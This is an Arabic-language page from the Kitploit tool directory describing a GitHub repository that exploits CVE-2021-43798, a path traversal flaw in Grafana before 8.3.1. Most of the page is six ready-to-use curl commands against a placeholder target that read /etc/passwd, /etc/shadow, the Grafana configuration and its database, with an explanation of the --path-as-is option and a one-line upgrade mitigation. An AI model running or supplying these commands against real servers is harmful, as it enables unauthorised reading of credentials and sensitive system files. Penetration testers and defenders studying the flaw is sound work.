Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43798 | Kitploit
أدوات/GitHubGitHub/malekalthubiany/cve-2021-43798
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Grafana CVE-2021-43798

نظرة عامة

يستعرض هذا المستودع استغلال CVE-2021-43798، وهي ثغرة اجتياز المسار (Directory Traversal) في Grafana. تسمح هذه الثغرة للمهاجمين بقراءة ملفات عشوائية على الخادم.

تفاصيل CVE

  • CVE: CVE-2021-43798
  • الوصف: ثغرة اجتياز المسار في إصدارات Grafana الأقدم من 8.3.1.
  • الأثر: تسمح للمهاجمين غير المصادَق عليهم بقراءة ملفات عشوائية على الخادم.

المتطلبات الأساسية

  • إصدار ثغِر من Grafana قيد التشغيل (قبل 8.3.1)
  • الوصول إلى مثيل Grafana المستهدف

الاستغلال

استخدام curl

لاستغلال الثغرة يدويًا، يمكنك استخدام أحد أوامر curl التالية لمحاولة قراءة الملفات الحساسة:

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

لماذا --path-as-is؟

في سياق استغلال ثغرة اجتياز المسار Grafana CVE-2021-43798، يُعد خيار --path-as-is ضروريًا لأنه يسمح بإرسال تسلسلات الاجتياز المصممة خصيصًا (../../../../../) مباشرة إلى الخادم دون تعديل. وقد يؤدي هذا إلى الوصول إلى ملفات حساسة على الخادم تقع خارج الدليل المقصود.

بدون --path-as-is، قد يقوم curl بتطبيع المسار إلى شيء مثل /public/plugins/Users/install.txt، وهو ما لن يستغل الثغرة. باستخدام --path-as-is، يتم الحفاظ على تسلسل الاجتياز الدقيق، مما يسمح للاستغلال بالنجاح.

مرجع التوثيق

يمكنك العثور على مزيد من التفاصيل حول خيار --path-as-is في توثيق curl. من خلال فهم واستخدام --path-as-is، يمكن لمتخصصي الأمن والباحثين إظهار واختبار ثغرات اجتياز المسار في تطبيقات الويب بشكل فعال.

التخفيف

للتخفيف من هذه الثغرة، قم بترقية Grafana إلى الإصدار 8.3.1 أو أحدث.

تنزيل الأداة